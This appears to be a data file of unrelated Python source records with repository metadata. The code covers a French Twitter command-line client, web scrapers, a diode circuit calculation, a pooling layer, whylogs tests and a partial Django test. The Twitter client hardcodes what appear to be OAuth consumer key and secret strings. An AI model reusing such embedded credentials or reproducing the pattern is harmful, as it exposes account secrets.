*Ajouter des personnes qui vous suivent et que vous ne suivez pas
-u (--unfollow)
*Cesser de suivre les personnes que vous suivez et qui \
vous ne suivent pas
-s (--search) MOTIF
*Search ( rechercher MOTIF dans vos anciens tweets)
-t (--tweet)
*Envoyer un tweet (message de 140 caractères maximum)
-o (--output) FILENAME.csv
*Exporter l'intégralité de vos tweets dans \
le fichier FILENAME.csv
-a (--api)
* Obtenir des informations sur l'utilisation de l'api twitter
-r (--report) FILENAME.pdf
* Générer un reporting format pdf avec la repartition des tweets par année et par mois
-d (--database) c|u
c (create)
*Créer ou récréer la base de données des tweets
u (update)
*Mettre à jour la base de données des tweets
"""), BLUE
)
if __name__ == "__main__":
try:
sys.exit(main())
except KeyboardInterrupt:
print("\n")
print(_(u"Merci d'avoir utilisé clitwit !"))
| <filename>cltwit/main.py
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Cltwit is a command line twitter utility
Author : <NAME>
Date : 2013
"""
import os
import sys
import re
import getopt
import gettext
import sqlite3
import webbrowser
import ConfigParser
from sqlite2csv import sqlite2csv
from cltwitdb import cltwitdb
from utils import LocalTimezone
from cltwitreport import TweetsReport
APP_NAME = 'cltwit'
LOC_PATH = os.path.dirname(__file__) + '/locale'
gettext.find(APP_NAME, LOC_PATH)
gettext.install(APP_NAME, LOC_PATH, True)
try:
import tweepy
except ImportError:
print(_("Veuillez installer tweetpy https://github.com/tweepy/tweepy"))
sys.exit()
# Répertoire pour conf et bdd
__cltwitdir__ = os.path.expanduser("~/.config/cltwit")
# Fichier de configuration
__configfile__ = __cltwitdir__ + "/cltwit.conf"
# base de données et table sqlite
__dblocation__ = __cltwitdir__ + '/data.db'
__tablename__ = 'twitter'
__Local__ = LocalTimezone()
# gestion des couleurs sur le terminal
BLACK, RED, GREEN, YELLOW, BLUE, MAGENTA, CYAN, WHITE = range(8)
def has_colours(stream):
"""Vérifier la prise en charge des couleurs par le terminal"""
if not hasattr(stream, "isatty"):
return False
if not stream.isatty():
return False # couleurs auto sur un TTY
try:
import curses
curses.setupterm()
return curses.tigetnum("colors") > 2
except:
# Si erreur on suppose false
return False
__has_colours__ = has_colours(sys.stdout)
def printout(text, colour=WHITE):
"""Print en couleur"""
if __has_colours__:
seq = "\x1b[1;%dm" % (30 + colour) + text + "\x1b[0m"
sys.stdout.write(seq)
else:
sys.stdout.write(text.encode("Utf-8"))
def checkdb():
""" Vérifier la présence de la bdd sqlite et la créer si absente """
if (not os.path.exists(__dblocation__)):
printout(_(u"Vous devez d'abord lancer la commande --database create \
pour créer une base de données de vos tweets."), RED)
sys.exit()
def checkconfig():
"""Récupérer la configuration ou la créer"""
# On ouvre le fichier de conf
config = ConfigParser.RawConfigParser()
try:
config.read(__configfile__)
if config.has_option('twitterapi', 'access_token'):
access_token = config.get('twitterapi', 'access_token')
if config.has_option('twitterapi', 'access_password'):
access_password = config.get('twitterapi', 'access_password')
except:
pass
auth = tweepy.OAuthHandler("Jus1rnqM6S0WojJfOH1kQ",
"AHQ5sTC8YYArHilXmqnsstOivY6ygQ2N27L1zBwk")
# Si aucune conf , autorisation de connexion à twitter via OAuth
if not(config.has_option('twitterapi', 'access_token') and
config.has_option('twitterapi', 'access_password')):
# On ouvre le navigateur web pour récupếrer le numéro d'autorisation
while True:
try:
webbrowser.open(auth.get_authorization_url())
var = raw_input(_("Entrez le token !\n"))
auth.get_access_token(var)
except Exception, e:
print(str(e))
continue
break
var = auth.access_token
# On récupère le token et le password
access_password = str(var).split("&")[0].split("=")[1]
access_token = str(var).split("&")[1].split("=")[1]
# écrire le fichier de conf avec les informations récupérées
try:
cfgfile = open(__configfile__, 'w')
if not(config.has_section('twitterapi')):
config.add_section('twitterapi')
config.set('twitterapi', 'access_token', access_token)
config.set('twitterapi', 'access_password', access_password)
config.write(cfgfile)
except IOError:
pass
finally:
cfgfile.close()
else: # Si un fichier de conf existait déjà
auth.set_access_token(access_token, access_password)
return auth
def login():
""" Se connecter à l'api twitter via tweepy """
auth = checkconfig()
api = tweepy.API(auth)
# On vérifie la connexion à l'api en récupérant le user name
try:
twittername = api.me().screen_name
except Exception, e:
if 'Unable to get username' in (str(e)):
printout(_(u"Impossible de s'authentifier avec l'api Twitter.\
Fonctionne en mode déconnecté"), RED)
print("\n")
twittername = "offline_mode"
printout(_(u"Authentifié avec le user twitter {0}").format(twittername.decode('utf-8')), GREEN)
print("\n")
return api, auth, twittername
def get_friends_followers(api):
"""Renvoie la liste des id des friends et followers"""
friend_id = []
follower_id = []
printout(_(u"Récupération des Followers..."), YELLOW)
print("\n")
for follower in tweepy.Cursor(api.followers).items():
follower_id.append(follower.id)
printout((u"Récupération des Friends..."), YELLOW)
print("\n")
for friend in tweepy.Cursor(api.friends).items():
friend_id.append(friend.id)
return friend_id, follower_id
def get_diff(liste1, liste2):
"""Renvoie les objets de liste1 qui ne sont pas dans liste2"""
return list(set(liste1).difference(set(liste2)))
def follow_users(api, user):
"""Suivre une personne"""
try:
api.create_friendship(user)
printout(_(u"Vous suivez maintenant {0}").format(api.get_user(user).screen_name.decode('utf-8')), GREEN)
except Exception, e:
print(e)
def unfollow_user(api, user):
"""Cesser de suivre une personne"""
try:
api.destroy_friendship(user)
printout(_(u"Vous ne suivez plus {0}").format(api.get_user(user).screen_name.decode('utf-8')), GREEN)
except Exception, e:
print(e)
def main(argv=None):
""" Point d'entrée """
# Si le répertoire pour la conf et la base de données n'existe pas le créer
if not os.path.exists(__cltwitdir__):
os.makedirs(__cltwitdir__)
#~ twittername = "offline_mode"
# Traitement des arguments
if argv is None:
argv = sys.argv
if len(argv) == 1:
help()
try:
opts, args = getopt.getopt(sys.argv[1:], "r:ahfut:o:s:d:",
["report", "api", "help", "follow", "unfollow", "tweet=", "output=", "search=", "database="])
except getopt.GetoptError, err:
print(err)
help()
sys.exit()
# traitement des options
for option, value in opts:
if option in ('-a', '--api'):
api, auth, twittername = login()
res = api.rate_limit_status()
rtime = res['reset_time']
rhits = res['remaining_hits']
hlimit = res['hourly_limit']
from dateutil.parser import parse
drtime = parse(rtime)
printout(_("Informations sur l'utilisation de l'api Twitter"), YELLOW)
print("\n")
# Définir l'heure locale qui correspond à l'heure renvoyée
# par l'api Twitter
rlocaltime = drtime.astimezone(__Local__)
printout(_("Maximum d'appels par heure: "), BLUE)
print hlimit
printout(_("Nombre d'appels restants: "), BLUE)
print rhits
printout(_("Heure du prochain reset: "), BLUE)
print rlocaltime.strftime("%H:%M %Y-%m-%d")
if option in ('-r', '--report'):
api, auth, twittername = login()
checkdb()
conn = sqlite3.connect(__dblocation__)
c = conn.cursor()
c.execute("select substr(date, 1,4) from twitter order by date asc limit 1")
dmois = c.fetchone()[0]
c.execute("select substr(date, 1,4) from twitter order by date desc limit 1")
fmois = c.fetchone()[0]
# Requête des données à exporter
dd = dict()
for a in range(int(dmois), int(fmois) + 1):
result = []
for m in range(1, 13):
mois = ('{num:02d}'.format(num=m))
c.execute("select count(*) from twitter where substr(date, 1,4) = '{0}' and substr(date, 6,2) = '{1}'".format(a, mois))
result.append(c.fetchone()[0])
dd[a] = result
c.close()
conn.close()
treport = TweetsReport(value)
# twittername = "offline"
treport.ecrireTitre(twittername)
nb = 0
for annee, donnees in dd.items():
nb += 1
if nb == 4:
treport.NextPage()
nb = 1
saut = 0
if nb == 1:
saut = 0
if nb == 2:
saut = 200
if nb == 3:
saut = 400
treport.ecrireLegende(saut, annee, donnees)
treport.addPie(saut, donnees)
treport.save()
printout(_(u"Report {0} créé !").format(value), GREEN)
print("\n")
sys.exit(0)
if option in ('-d', '--database'):
if value in ('u', 'update'):
# Se connecter à l'api twitter
api, auth, twittername = login()
# Mettre à jour la base de données
db = cltwitdb(__dblocation__, __tablename__)
printout(_(u"Mise à jour de la base de données de {0}").format(twittername.decode('utf-8')), YELLOW)
print("\n")
nb = db.update(api, twittername)
printout(_(u"Ajout de {0} tweet(s) dans la base de données.").format(nb), GREEN)
if value in ('c', 'create'):
# Se connecter à l'api twitter
api, auth, twittername = login()
# Créer la base de données
db = cltwitdb(__dblocation__, __tablename__)
printout(_(u"Création de la liste des tweets de ") + twittername.decode('utf-8'), YELLOW)
db.create(api, twittername)
printout(_(u"Base de données crée"), GREEN)
sys.exit()
#~ database_create(api,twittername)
if option in ("-o", "--output"):
# Exporter en csv
checkdb()
conn = sqlite3.connect(__dblocation__)
c = conn.cursor()
# Requête des données à exporter
c.execute('select date, tweet, url from {0} order by date desc'.format(__tablename__))
# On appelle la classe sqlite2csv qui se charge de l'export
export = sqlite2csv(open(value, "wb"))
# Entête du fichier csv
export.writerow(["Date", "Tweet", "URL"])
# Lignes du fichier csv
export.writerows(c)
# On ferme la connexion sqlite et le curseur
c.close()
conn.close()
printout(_(u"Fichier csv {0} créé.").format(value.decode('utf-8')), GREEN)
sys.exit()
if option in ("-s", "--search"):
# Rechercher un motif dans la base des tweets
checkdb()
printout(_(u"Recherche de {0} dans vos anciens tweets...")
.format(value.decode('utf-8')), YELLOW)
print("\n")
# la méthode search retourne un tuple avec les champs
# qui contiennent le motif
db = cltwitdb(__dblocation__, __tablename__)
results = db.search(value, "tweet")
for result in results:
print((u"{0} -> {1}\n{2}\n\n").format(result[1].decode('utf-8'), result[4].decode('utf-8'), result[2].decode('utf-8')))
if option in ("-u", "--unfollow"):
# Se connecter à l'api twitter
api, auth, twittername = login()
# Créer les liste friend et followers (par id)
friend_id, follower_id = get_friends_followers(api)
# Création des listes follow et unfollow
follow_liste = get_diff(follower_id, friend_id)
unfollow_liste = get_diff(friend_id, follower_id)
# Un-follow
printout(_("Vous suivez {0} personnes qui ne vous suivent pas.")
.format(len(unfollow_liste)), YELLOW)
print("\n")
printout(_("Voulez changer cela ? (o/N)"), BLUE)
print("\n")
reponse = raw_input("> ")
if (reponse.lower() == 'o' or reponse.lower() == 'y'):
for user in unfollow_liste:
printout(_("Voulez-vous cesser de suivre {0} ? (o/N)")
.format(api.get_user(user).screen_name), BLUE)
print("\n")
reponse = raw_input("> ")
if (reponse.lower() == 'o' or reponse.lower() == 'y'):
unfollow_user(api, user)
if option in ("-f", "--follow"):
# Se connecter à l'api twitter
api, auth, twittername = login()
# Créer les liste friend et followers (par id)
friend_id, follower_id = get_friends_followers(api)
# Création des listes follow et unfollow
follow_liste = get_diff(follower_id, friend_id)
unfollow_liste = get_diff(friend_id, follower_id)
# follow
printout(_("{0} personnes vous suivent alors que vous ne les suivez pas.")
.format(len(follow_liste)), YELLOW)
print("\n")
printout(_("Voulez changer cela ? (o/N)"), BLUE)
print("\n")
reponse = raw_input("> ")
if (reponse.lower() == 'o' or reponse.lower() == 'y'):
for user in follow_liste:
printout(_("Voulez-vous suivre {0} ? (o/N)"
.format(api.get_user(user).screen_name)), BLUE)
print("\n")
reponse = raw_input("> ")
if (reponse.lower() == 'o' or reponse.lower() == 'y'):
follow_users(api, user)
if option in ("-t", "--tweet"):
# Se connecter à l'api twitter
api, auth, twittername = login()
# Envoyer un tweet
tweet_size = len(re.sub("https://\S*", "X"*23, re.sub("http://\S*", "X"*22, value)))
if tweet_size < 141:
api.update_status(value)
print("\n")
printout(_(u"Tweet envoyé !"), GREEN)
else:
printout(_(u"La limite pour un tweet est de 140 caractères, votre message \
fait {0} caractères de trop").format(str(tweet_size - 140).decode('utf-8')), RED)
sys.exit()
if option in ("-h", "--help"):
help()
def help():
printout(_(u"""
Usage :
cltwit [OPTIONS]
Options :
-f (--follow)
*Ajouter des personnes qui vous suivent et que vous ne suivez pas
-u (--unfollow)
*Cesser de suivre les personnes que vous suivez et qui \
vous ne suivent pas
-s (--search) MOTIF
*Search ( rechercher MOTIF dans vos anciens tweets)
-t (--tweet)
*Envoyer un tweet (message de 140 caractères maximum)
-o (--output) FILENAME.csv
*Exporter l'intégralité de vos tweets dans \
le fichier FILENAME.csv
-a (--api)
* Obtenir des informations sur l'utilisation de l'api twitter
-r (--report) FILENAME.pdf
* Générer un reporting format pdf avec la repartition des tweets par année et par mois
-d (--database) c|u
c (create)
*Créer ou récréer la base de données des tweets
u (update)
*Mettre à jour la base de données des tweets
"""), BLUE
)
if __name__ == "__main__":
try:
sys.exit(main())
except KeyboardInterrupt:
print("\n")
print(_(u"Merci d'avoir utilisé clitwit !"))
| fr | 0.977159 | #!/usr/bin/env python2 # -*- coding: utf-8 -*- Cltwit is a command line twitter utility Author : <NAME> Date : 2013 # Répertoire pour conf et bdd # Fichier de configuration # base de données et table sqlite # gestion des couleurs sur le terminal Vérifier la prise en charge des couleurs par le terminal # couleurs auto sur un TTY # Si erreur on suppose false Print en couleur Vérifier la présence de la bdd sqlite et la créer si absente Récupérer la configuration ou la créer # On ouvre le fichier de conf # Si aucune conf , autorisation de connexion à twitter via OAuth # On ouvre le navigateur web pour récupếrer le numéro d'autorisation # On récupère le token et le password # écrire le fichier de conf avec les informations récupérées # Si un fichier de conf existait déjà Se connecter à l'api twitter via tweepy # On vérifie la connexion à l'api en récupérant le user name Renvoie la liste des id des friends et followers Renvoie les objets de liste1 qui ne sont pas dans liste2 Suivre une personne Cesser de suivre une personne Point d'entrée # Si le répertoire pour la conf et la base de données n'existe pas le créer #~ twittername = "offline_mode" # Traitement des arguments # traitement des options # Définir l'heure locale qui correspond à l'heure renvoyée # par l'api Twitter # Requête des données à exporter # twittername = "offline" # Se connecter à l'api twitter # Mettre à jour la base de données # Se connecter à l'api twitter # Créer la base de données #~ database_create(api,twittername) # Exporter en csv # Requête des données à exporter # On appelle la classe sqlite2csv qui se charge de l'export # Entête du fichier csv # Lignes du fichier csv # On ferme la connexion sqlite et le curseur # Rechercher un motif dans la base des tweets # la méthode search retourne un tuple avec les champs # qui contiennent le motif # Se connecter à l'api twitter # Créer les liste friend et followers (par id) # Création des listes follow et unfollow # Un-follow # Se connecter à l'api twitter # Créer les liste friend et followers (par id) # Création des listes follow et unfollow # follow # Se connecter à l'api twitter # Envoyer un tweet Usage : cltwit [OPTIONS] Options : -f (--follow) *Ajouter des personnes qui vous suivent et que vous ne suivez pas -u (--unfollow) *Cesser de suivre les personnes que vous suivez et qui \ vous ne suivent pas -s (--search) MOTIF *Search ( rechercher MOTIF dans vos anciens tweets) -t (--tweet) *Envoyer un tweet (message de 140 caractères maximum) -o (--output) FILENAME.csv *Exporter l'intégralité de vos tweets dans \ le fichier FILENAME.csv -a (--api) * Obtenir des informations sur l'utilisation de l'api twitter -r (--report) FILENAME.pdf * Générer un reporting format pdf avec la repartition des tweets par année et par mois -d (--database) c|u c (create) *Créer ou récréer la base de données des tweets u (update) *Mettre à jour la base de données des tweets | 2.597198 | 3 |
weibo_image_spider/exceptions.py | lonsty/weibo-pic-spider-hd | 0 | 8528 | # @AUTHOR : lonsty
# @DATE : 2020/3/28 18:01
class CookiesExpiredException(Exception):
pass
class NoImagesException(Exception):
pass
class ContentParserError(Exception):
pass
class UserNotFound(Exception):
pass
| # @AUTHOR : lonsty
# @DATE : 2020/3/28 18:01
class CookiesExpiredException(Exception):
pass
class NoImagesException(Exception):
pass
class ContentParserError(Exception):
pass
class UserNotFound(Exception):
pass
| en | 0.341225 | # @AUTHOR : lonsty # @DATE : 2020/3/28 18:01 | 1.490781 | 1 |
WebHtmlExample/WebHtmlExample.py | lilei644/python-learning-example | 2 | 8529 | <reponame>lilei644/python-learning-example
import requests
from bs4 import BeautifulSoup
import re
# 设置请求头
# 更换一下爬虫的User-Agent,这是最常规的爬虫设置
headers = {
"User-Agent": 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'}
# 获取天气信息
def get_weather():
html = requests.get("http://www.weather.com.cn/weather/101280601.shtml", headers=headers)
html.encoding = "utf-8"
if html.status_code == 200:
soup = BeautifulSoup(html.text, "lxml")
light_list = soup.select('p.tem span')
night_list = soup.select('p.tem i')
for index in range(0, len(light_list)):
print('白天温度:{0}, 夜晚温度:{1}'.format(light_list[index].get_text(), night_list[index].get_text()))
# 获取贴吧回复数
def get_bar():
html = requests.get("http://tieba.baidu.com/f?ie=utf-8&kw=python3", headers=headers)
html.encoding = "utf-8"
if html.status_code == 200:
# <span class="threadlist_rep_num center_text" title="回复">9</span>
tag_list = re.findall(r'(?<="回复">)\d*(?=</span>)', html.text)
print(tag_list)
if __name__ == '__main__':
get_weather()
get_bar()
| import requests
from bs4 import BeautifulSoup
import re
# 设置请求头
# 更换一下爬虫的User-Agent,这是最常规的爬虫设置
headers = {
"User-Agent": 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'}
# 获取天气信息
def get_weather():
html = requests.get("http://www.weather.com.cn/weather/101280601.shtml", headers=headers)
html.encoding = "utf-8"
if html.status_code == 200:
soup = BeautifulSoup(html.text, "lxml")
light_list = soup.select('p.tem span')
night_list = soup.select('p.tem i')
for index in range(0, len(light_list)):
print('白天温度:{0}, 夜晚温度:{1}'.format(light_list[index].get_text(), night_list[index].get_text()))
# 获取贴吧回复数
def get_bar():
html = requests.get("http://tieba.baidu.com/f?ie=utf-8&kw=python3", headers=headers)
html.encoding = "utf-8"
if html.status_code == 200:
# <span class="threadlist_rep_num center_text" title="回复">9</span>
tag_list = re.findall(r'(?<="回复">)\d*(?=</span>)', html.text)
print(tag_list)
if __name__ == '__main__':
get_weather()
get_bar() | zh | 0.418808 | # 设置请求头 # 更换一下爬虫的User-Agent,这是最常规的爬虫设置 # 获取天气信息 # 获取贴吧回复数 # <span class="threadlist_rep_num center_text" title="回复">9</span> | 3.231842 | 3 |
Codi/diode.py | JosepFanals/HELM | 1 | 8530 | import numpy as np
import math
import matplotlib.pyplot as plt
U = 5 # equival a l'E
R = 2 # equival a R1
R2 = 3
P = 1.2
Vt = 0.026
Is = 0.000005
n = 200 # profunditat
Vd = np.zeros(n) # sèries
Vl = np.zeros(n)
I1 = np.zeros(n)
I1[0] = U / R # inicialització de les sèries
Vd[0] = Vt * math.log(1 + I1[0] / Is)
Vl[0] = P / I1[0]
def convVd(Vd, I, i): # convolució pel càlcul de Vd[i]
suma = 0
for k in range(1, i):
suma += k * Vd[k] * I[i - k]
return suma
def convVlI(Vl, I1, i): # convolució pel càlcul de Vl[i]
suma = 0
for k in range(i):
suma = suma + Vl[k] * I1[i - k]
return suma
for i in range(1, n): # càlcul dels coeficients
I1[i] = (1 / R + 1 / R2) * (-Vd[i - 1] - Vl[i - 1])
Vd[i] = (i * Vt * I1[i] - convVd(Vd, I1, i)) / (i * (Is + I1[0]))
Vl[i] = -convVlI(Vl, I1, i) / I1[0]
If = sum(I1)
Vdf = sum(Vd)
Vlf = sum(Vl)
print('I1: ' + str(If))
print('Vd: ' + str(Vdf))
print('Vl: ' + str(Vlf))
print('P: ' + str(Vlf * If))
Vdfinal = np.zeros(n) # per tal de veure com evoluciona la tensió del díode
for j in range(n):
Vdfinal[j] = np.sum([Vd[:(j+1)]])
print(Vdfinal)
| import numpy as np
import math
import matplotlib.pyplot as plt
U = 5 # equival a l'E
R = 2 # equival a R1
R2 = 3
P = 1.2
Vt = 0.026
Is = 0.000005
n = 200 # profunditat
Vd = np.zeros(n) # sèries
Vl = np.zeros(n)
I1 = np.zeros(n)
I1[0] = U / R # inicialització de les sèries
Vd[0] = Vt * math.log(1 + I1[0] / Is)
Vl[0] = P / I1[0]
def convVd(Vd, I, i): # convolució pel càlcul de Vd[i]
suma = 0
for k in range(1, i):
suma += k * Vd[k] * I[i - k]
return suma
def convVlI(Vl, I1, i): # convolució pel càlcul de Vl[i]
suma = 0
for k in range(i):
suma = suma + Vl[k] * I1[i - k]
return suma
for i in range(1, n): # càlcul dels coeficients
I1[i] = (1 / R + 1 / R2) * (-Vd[i - 1] - Vl[i - 1])
Vd[i] = (i * Vt * I1[i] - convVd(Vd, I1, i)) / (i * (Is + I1[0]))
Vl[i] = -convVlI(Vl, I1, i) / I1[0]
If = sum(I1)
Vdf = sum(Vd)
Vlf = sum(Vl)
print('I1: ' + str(If))
print('Vd: ' + str(Vdf))
print('Vl: ' + str(Vlf))
print('P: ' + str(Vlf * If))
Vdfinal = np.zeros(n) # per tal de veure com evoluciona la tensió del díode
for j in range(n):
Vdfinal[j] = np.sum([Vd[:(j+1)]])
print(Vdfinal)
| ca | 0.997665 | # equival a l'E # equival a R1 # profunditat # sèries # inicialització de les sèries # convolució pel càlcul de Vd[i] # convolució pel càlcul de Vl[i] # càlcul dels coeficients # per tal de veure com evoluciona la tensió del díode | 2.925153 | 3 |
proxybroker/errors.py | aljeshishe/ProxyBroker | 0 | 8531 | <filename>proxybroker/errors.py
"""Errors."""
class ProxyError(Exception):
pass
class NoProxyError(Exception):
pass
class ResolveError(Exception):
pass
class ProxyConnError(ProxyError):
pass
class ProxyRecvError(ProxyError): # connection_is_reset
pass
class ProxySendError(ProxyError): # connection_is_reset
pass
class ProxyTimeoutError(ProxyError):
pass
class ProxyEmptyResponseError(ProxyError):
pass
class BadStatusError(Exception): # BadStatusLine
pass
class BadResponseError(Exception):
pass
class BadStatusLine(Exception):
pass
class ErrorOnStream(Exception):
pass
| <filename>proxybroker/errors.py
"""Errors."""
class ProxyError(Exception):
pass
class NoProxyError(Exception):
pass
class ResolveError(Exception):
pass
class ProxyConnError(ProxyError):
pass
class ProxyRecvError(ProxyError): # connection_is_reset
pass
class ProxySendError(ProxyError): # connection_is_reset
pass
class ProxyTimeoutError(ProxyError):
pass
class ProxyEmptyResponseError(ProxyError):
pass
class BadStatusError(Exception): # BadStatusLine
pass
class BadResponseError(Exception):
pass
class BadStatusLine(Exception):
pass
class ErrorOnStream(Exception):
pass
| en | 0.415832 | Errors. # connection_is_reset # connection_is_reset # BadStatusLine | 2.126809 | 2 |
questionanswering/models/pooling.py | lvying1991/KBQA-System | 2 | 8532 | <filename>questionanswering/models/pooling.py
import torch
from torch import nn as nn
from torch import autograd
class LogSumExpPooling1d(nn.Module):
"""Applies a 1D LogSumExp pooling over an input signal composed of several input planes.
LogSumExp is a smooth approximation of the max function.
在由多个输入平面组成的输入信号上应用1D LogSumExp池。
LogSumExp是max函数的平滑近似值。
Examples:
>>> m = LogSumExpPooling1d()
>>> input = autograd.Variable(torch.randn(4, 5, 10))
>>> m(input).squeeze()
"""
def __init__(self):
super(LogSumExpPooling1d, self).__init__()
def forward(self, x):
x.exp_()
x = x.sum(dim=-1, keepdim=True)
x.log_()
return x
def __repr__(self):
return self.__class__.__name__ + '()'
| <filename>questionanswering/models/pooling.py
import torch
from torch import nn as nn
from torch import autograd
class LogSumExpPooling1d(nn.Module):
"""Applies a 1D LogSumExp pooling over an input signal composed of several input planes.
LogSumExp is a smooth approximation of the max function.
在由多个输入平面组成的输入信号上应用1D LogSumExp池。
LogSumExp是max函数的平滑近似值。
Examples:
>>> m = LogSumExpPooling1d()
>>> input = autograd.Variable(torch.randn(4, 5, 10))
>>> m(input).squeeze()
"""
def __init__(self):
super(LogSumExpPooling1d, self).__init__()
def forward(self, x):
x.exp_()
x = x.sum(dim=-1, keepdim=True)
x.log_()
return x
def __repr__(self):
return self.__class__.__name__ + '()'
| en | 0.44666 | Applies a 1D LogSumExp pooling over an input signal composed of several input planes. LogSumExp is a smooth approximation of the max function. 在由多个输入平面组成的输入信号上应用1D LogSumExp池。 LogSumExp是max函数的平滑近似值。 Examples: >>> m = LogSumExpPooling1d() >>> input = autograd.Variable(torch.randn(4, 5, 10)) >>> m(input).squeeze() | 3.162076 | 3 |
tests/unit/app/test_session.py | bernease/whylogs-python | 0 | 8533 | <reponame>bernease/whylogs-python
import pytest
from whylogs.app.session import get_or_create_session, get_session, get_logger, reset_default_session, session_from_config
from whylogs.app.config import SessionConfig
from whylogs.app.session import Session
from pandas import util
def test_get_global_session():
_session = None
session = get_or_create_session()
global_session = get_session()
assert session == global_session
def test_reset():
session = get_or_create_session()
reset_default_session()
global_session = get_session()
assert global_session.project is not None
def test_session_log_dataframe():
_session = None
session = session_from_config(SessionConfig(
"default-project", "default-pipeline", [], False
))
df = util.testing.makeDataFrame()
profile = session.log_dataframe(df)
assert session.logger() is not None
assert session.logger("default-project").dataset_name == "default-project"
def test_session_profile():
session = session_from_config(SessionConfig(
"default-project", "default-pipeline", [], False
))
df = util.testing.makeDataFrame()
profile = session.log_dataframe(df)
assert profile is not None
summary = profile.flat_summary()
flat_summary = summary['summary']
assert len(flat_summary) == 4
def test_profile_df():
session = get_or_create_session()
df = util.testing.makeDataFrame()
log_profile = session.log_dataframe(df)
profile = session.profile_dataframe(df)
assert log_profile.name == profile.name
assert log_profile.dataset_timestamp == profile.dataset_timestamp
assert log_profile.session_timestamp == profile.session_timestamp
assert len(profile.columns) == 4
assert len(log_profile.tags) == 1
assert len(profile.tags) == 2
def test_close_session():
session = get_or_create_session()
session.close()
assert session.is_active() == False
df = util.testing.makeDataFrame()
log_profile = session.log_dataframe(df)
assert log_profile == None
profile = session.profile_dataframe(df)
assert profile == None
profile = session.new_profile(df)
assert profile == None
with pytest.raises(RuntimeError):
session.logger()
def test_logger_cache():
_session = None
session = get_or_create_session()
with session.logger("cache-test", with_rotation_time="s") as logger:
logger.log({"name": 1})
session.close()
def test_remove_logger():
session = get_or_create_session()
session.logger("default-project")
with pytest.raises(KeyError):
session.remove_logger("test")
| import pytest
from whylogs.app.session import get_or_create_session, get_session, get_logger, reset_default_session, session_from_config
from whylogs.app.config import SessionConfig
from whylogs.app.session import Session
from pandas import util
def test_get_global_session():
_session = None
session = get_or_create_session()
global_session = get_session()
assert session == global_session
def test_reset():
session = get_or_create_session()
reset_default_session()
global_session = get_session()
assert global_session.project is not None
def test_session_log_dataframe():
_session = None
session = session_from_config(SessionConfig(
"default-project", "default-pipeline", [], False
))
df = util.testing.makeDataFrame()
profile = session.log_dataframe(df)
assert session.logger() is not None
assert session.logger("default-project").dataset_name == "default-project"
def test_session_profile():
session = session_from_config(SessionConfig(
"default-project", "default-pipeline", [], False
))
df = util.testing.makeDataFrame()
profile = session.log_dataframe(df)
assert profile is not None
summary = profile.flat_summary()
flat_summary = summary['summary']
assert len(flat_summary) == 4
def test_profile_df():
session = get_or_create_session()
df = util.testing.makeDataFrame()
log_profile = session.log_dataframe(df)
profile = session.profile_dataframe(df)
assert log_profile.name == profile.name
assert log_profile.dataset_timestamp == profile.dataset_timestamp
assert log_profile.session_timestamp == profile.session_timestamp
assert len(profile.columns) == 4
assert len(log_profile.tags) == 1
assert len(profile.tags) == 2
def test_close_session():
session = get_or_create_session()
session.close()
assert session.is_active() == False
df = util.testing.makeDataFrame()
log_profile = session.log_dataframe(df)
assert log_profile == None
profile = session.profile_dataframe(df)
assert profile == None
profile = session.new_profile(df)
assert profile == None
with pytest.raises(RuntimeError):
session.logger()
def test_logger_cache():
_session = None
session = get_or_create_session()
with session.logger("cache-test", with_rotation_time="s") as logger:
logger.log({"name": 1})
session.close()
def test_remove_logger():
session = get_or_create_session()
session.logger("default-project")
with pytest.raises(KeyError):
session.remove_logger("test") | none | 1 | 2.401841 | 2 |
|
Packages/constants.py | Bemesko/Intelligence-of-Home-GUI | 0 | 8534 | <reponame>Bemesko/Intelligence-of-Home-GUI<filename>Packages/constants.py
import enum
BASELINE = "baseline"
ENERGY = "energy"
MAX_PRICE = "max_price"
START_PRICE = "starting_price"
INCREMENT = "increment"
MIN_PRICE = "min_price"
MAX_LOT_SIZE = "max_lot_size_wh"
NAMESERVER_AGENT_AMOUNT = 3
ATTRIBUTE_LIST_LENGTH = 50
NEXT_ENERGY_CONSUMPTION = "next_energy_consumption"
NEXT_ENERGY_GENERATION = "next_energy_generation"
ENERGY_DIFFERENCE = "energy_difference"
ENERGY_MARKET_PRICE = "energy_market_price"
WANTED_ENERGY = "wanted_energy"
ENERGY_BUY_MAX_PRICE = "energy_buy_max_price"
ENERGY_BUY_STARTING_PRICE = "energy_buy_starting_price"
ENERGY_BUY_PRICE_INCREMENT = "energy_buy_price_increment"
ENERGY_SELL_MIN_PRICE = "energy_sell_min_price"
class buy_baseline(enum.Enum):
deficit = 0
all_energy = 1
infinite = 2
none = 3
class sell_baseline(enum.Enum):
surplus = 0
all_energy = 1
none = 2
| import enum
BASELINE = "baseline"
ENERGY = "energy"
MAX_PRICE = "max_price"
START_PRICE = "starting_price"
INCREMENT = "increment"
MIN_PRICE = "min_price"
MAX_LOT_SIZE = "max_lot_size_wh"
NAMESERVER_AGENT_AMOUNT = 3
ATTRIBUTE_LIST_LENGTH = 50
NEXT_ENERGY_CONSUMPTION = "next_energy_consumption"
NEXT_ENERGY_GENERATION = "next_energy_generation"
ENERGY_DIFFERENCE = "energy_difference"
ENERGY_MARKET_PRICE = "energy_market_price"
WANTED_ENERGY = "wanted_energy"
ENERGY_BUY_MAX_PRICE = "energy_buy_max_price"
ENERGY_BUY_STARTING_PRICE = "energy_buy_starting_price"
ENERGY_BUY_PRICE_INCREMENT = "energy_buy_price_increment"
ENERGY_SELL_MIN_PRICE = "energy_sell_min_price"
class buy_baseline(enum.Enum):
deficit = 0
all_energy = 1
infinite = 2
none = 3
class sell_baseline(enum.Enum):
surplus = 0
all_energy = 1
none = 2 | none | 1 | 2.580655 | 3 |
|
target/tests.py | groundupnews/gu | 19 | 8535 | <reponame>groundupnews/gu
from django.contrib.auth.models import User
from django.test import TestCase
from django.test import Client
from django.urls import reverse
from target import models
from django.utils import timezone
# Create your tests here.
class URLSWork(TestCase):
@classmethod
def setUpTestData(cls):
target = models.Target()
target.letters = 'practical'
target.words = 'practical'
target.published = timezone.now()
target.number = 1
target.save()
def test_urls(self):
user = User.objects.create_user('admin', '<EMAIL>', '<PASSWORD>')
user.is_staff = True
user.is_active = True
user.is_superuser = True
user.save()
c = Client()
response = c.login(username='admin', password='<PASSWORD>')
